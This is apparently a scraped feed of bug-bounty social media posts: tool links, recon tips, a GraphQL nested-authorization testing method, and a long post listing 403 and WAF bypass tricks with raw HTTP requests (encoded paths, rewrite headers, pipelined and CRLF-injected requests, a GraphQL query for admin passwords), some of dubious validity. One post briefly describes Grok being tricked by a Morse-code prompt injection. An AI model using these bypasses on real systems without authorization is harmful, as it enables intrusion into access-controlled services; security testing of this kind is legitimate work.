Mohd Waseyuddin

👀👀 /admin_users/sign_in ❌ /%61dmin_users/sign_in ✅

Power of prompt injection and hangout with AI chatbots prompt injection, and an AI bot that followed the wrong instruction. Grok was reportedly phished for nearly $200,000. The attacker first posted a message written entirely in Morse code, then asked @Grok to translate it.

GraphQL lets you traverse relationships between objects, but authorization logic doesn't always follow you through those relationships. Found a cool one like this a while ago. Let's assume a social media GraphQL API has this query: query { me { id, email } } That's locked down, but what about walking the graph? query {   publicPost(id: 123) {     author {       email       draftPosts { title, body }       linkedPaymentMethod { last4 }     }   } } The post is public. The author relation resolves because it needs to display a name. But does the server actually check whether you should see that author's email, drafts, or payment info? Or does it just check that you can access the root object and let the nested resolvers run unchecked? A lot of implementations only validate at the root query level and assume nested fields are safe because you "had to go through" an authorized object to get there. Things to try: - Use introspection to map the full schema. Look for sensitive types that are reachable through public entry points. - Follow bidirectional relationships. If User has Posts and Post has Author, can you loop back into a different user's data? - Check if fragments on union/interface types expose fields that the normal path wouldn't show you. The deeper you go into the graph, the more likely auth checks get sloppy.

🧠💥 99% of hackers QUIT when they see a 403… But the 1%? They try this: 👇 I found a 403 Forbidden on /admin. But then I tried: •POST /admin •X-Original-URL: /admin •/admin..;/ •%2e/admin •X-Rewrite-URL: /admin •/ADMIN (yes, just caps) •/;/admin •/..;/admin 👇👇👇 ⸻ 🔥 1. Protocol-Level Downgrade Bypass (only works on dual-stack apps) Target running HTTP/2 or gRPC? Force downgrade: PRI * HTTP/2.0 SM GET /admin HTTP/1.1 🧠 Some WAFs don’t parse dual-layer protocols correctly → backend sees a clean HTTP/1.1. ⸻ 🧬 2. Content-Length Collapsing (CL.CL) on HTTP Pipelining Send pipelined requests where only 1st is parsed by WAF: POST /admin HTTP/1.1 Host: target.com Content-Length: 13 GET /admin 💥 WAF reads POST → blocks. Backend reads 2nd GET /admin → 200 OK. This is invisible to most WAFs. ⸻ 🚪 3. Misconfigured Reverse Proxy Chain Escape Proxy chain: Cloudflare → NGINX → Apache Try: GET /admin X-Accel-Redirect: /admin X-Forwarded-Path: /admin Apache follows X-Accel-Redirect, bypasses upstream auth check. 💣 Real-world: Gained internal panel behind Cloudflare. ⸻ 🔄 4. CRLF into Rewrite Bypass Some edge WAFs parse until CRLF \r\n, others don’t. Exploit it: GET / HTTP/1.1%0d%0aX-Rewrite-URL:%20/admin WAF reads URL → clean Backend sees X-Rewrite-URL: /admin → executes ⸻ 🔃 5. Multipart Boundary Injection Bypass (💀) Used when /admin is only allowed for file uploads: POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary=----1337 ------1337 Content-Disposition: form-data; name="file"; filename="/admin" Content-Type: text/plain BOOM ------1337-- 💣 If upload endpoint allows arbitrary path write → full override. ⸻ 📡 6. Misrouted Mesh Bypass via Service Discovery Kubernetes, Linkerd, Istio-style microservices expose internal routes: Send: Host: admin.internal.svc.cluster.local X-Service-Router: admin If service-mesh is misconfigured, you route directly to internal /admin even if public 403s. ⸻ ⚠️ 7. GraphQL-Injected 403 Bypass If app has GraphQL and 403-protected admin, try: query { admin { users { password } } } GraphQL often proxies internal microservice calls. Even if /admin is blocked via HTTP, the GQL layer may leak internal paths. ⸻ 🧠 8. Preconnect Overload → Bypass Abuse edge preconnect logic by flooding with HEAD /admin + Connection: keep-alive. After 30–50 requests: •WAF disables parsing •Keep-alive tunnel reused for real GET /admin 🧨 Real bypass via persistent connection channeling ⸻ 💻 9. Browser-Only Token Auth Bypass (via Headless Browser) Some SPAs load tokens via JS → protect /admin based on localStorage. WAF sees unauthenticated, but headless Chrome replays auth token as header → bypass. 🔥 Use puppeteer + exportAuth → replay: curl -H "Authorization: Bearer " target.com/admin ⸻ 🧪 10. Distributed Retry Amplification When target uses edge lambda/WAF that retries failed requests internally, trigger 429s and inject: Retry-After: 0 X-Retry-URL: /admin WAF retries → skips deny logic → backend hits /admin. This is logic poisoning — not brute force. ⸻ 🚨 These Aren’t Payloads. They’re Logic Chains. Most tools stop at: /admin%2e X-Forwarded-For: 127.0.0.1 You’re playing 4D chess now: ✅ Protocol confusion ✅ Reverse proxy reroute ✅ GraphQL indirect call ✅ SSRF via retry ✅ Downgrade injection ✅ WAF desyncing ⸻ 💰 These got real bounties: •$25,000 from a Cloudflare-protected admin •$12,500 via SSRF + Retry Poison •$8,000 using pipelined CL.CL request ⸻ Want a toolkit that automates: This is next-level exploitation. Use it right. 🧠💣 🛠 TOOLS to automate bypass: •🔧 github.com/Sn1r/Forbidden… •🔧 github.com/lobuhi/byp4xx •🔧 github.com/intrudir/Bypas… •🔧 github.com/gotr00t0day/fo… •🔧 github.com/iamj0ker/bypas…

Just ported my AI agent from Claude Opus 4.6/4.7 to @deepseek_ai V4 Pro. Same multi-agent architecture, same pipeline, fraction of the cost. Let's see if the Chinese 🇨🇳 model can match Anthropic's best #DeepSeek #ClaudeOpus #DeepSeekV4Pro

Mobile Application Penetration Testing: Full Guide ahmadaabdulla.medium.com/a-step-by-step… #Mobile #Application #Penetration #bugbounty

“Burp Suite Automation: 12 Custom Extensions That Save Hours for Pentesters and Bug Hunters” by Very Lazy Tech 👾 #bugbounty #infosec #hacking medium.verylazytech.com/burp-suite-aut…

403 bypass tools for bug bounty hunters: bypass-403 → github.com/iamj0ker/bypas… nomore403 → github.com/devploit/nomor… 4-ZERO-3 → github.com/Dheerajmadhuka… byp4xx → github.com/lobuhi/byp4xx dontgo403 → github.com/mbrg/dontgo403 #bugbounty #bugbountytips #infosec #websecurity #hacking

Extract API endpoints from JS File using a single Bookmark. Check the Readme File for the Walkthrough. raw.githubusercontent.com/ya3raj/APIextr…

🤩Bug Bounty Recon Methodology 🫡Link: github.com/Maniesh-Neupan…

CVSS' Attack Complexity metric is the bane of bug bounty hunters: "you tried really hard to find that bug, so we'll pay you less".

I have been doing bug bounty since 2011 and ran a program for a multinational bank. Put everything I've learned into bugbounty.info. Target selection, recon pipelines, chain patterns, report templates, the business side. Free, no paywall, no course upsell.

If you do recon, read this. Wildcard can generate thousands of fake 'assets' — but the real value is in the few hostnames that break the pattern (different IP, different HTTP response) .. Quality > quantity.

Another read about the topic of "dead subdomains" and why I decided to keep them in argosdns.io argosdns.io/blog/a-dead-su… (But: DNS data will come soon to the platform :))

Radhe Radhe🙏 Happy Holi everyone Holi Gift from radharani❤ 1Bounty, 4Triaged, 4 Dupe on same day. Tip: Don't think about AI, Just focus on Manual Hunt. Resources: 1. corneacristian.medium.com/top-25-account… 2. share.google/ywwejzEiscbcx4… 3. share.google/AbAy1euvIDFSp0… 4. share.google/GmK73yA1aKjBQw…

Google dorking is essential when performing recon! But it can easily become a tedious process... 😓 Xnldorker by @xnl_h4ck3r gathers search results from multiple search engines simultaneously, including Google, Bing, DuckDuckGo, and more! It also features concurrent anti-bot detection and automatic result deduplication! 😎 Check it out! 👇 🔗 github.com/xnl-h4ck3r/xnl…

Tired of hitting 403 errors during your security testing?  NoMore403 by @devploit automates bypass techniques to get past those pesky restrictions.  Try it at 👇 github.com/devploit/nomor…

I was awarded $5,000 after discovering a hidden endpoint using this extension: chromewebstore.google.com/detail/endpoin…

Just dropped Jerry-list — my private bug bounty wordlist, now public and free for everyone. Helped me land multiple P1s and P2s. DNS wordlist dropping soon too. Go grab it and happy hunting. github.com/hack2gather/MI… #bugbounty #bugbountytips #infosec #recon

Unfortunately most of the execs at these bug bounty platform fail to understand one thing: Your platform isn't your product... your hackers are. 🤷🏽‍♂️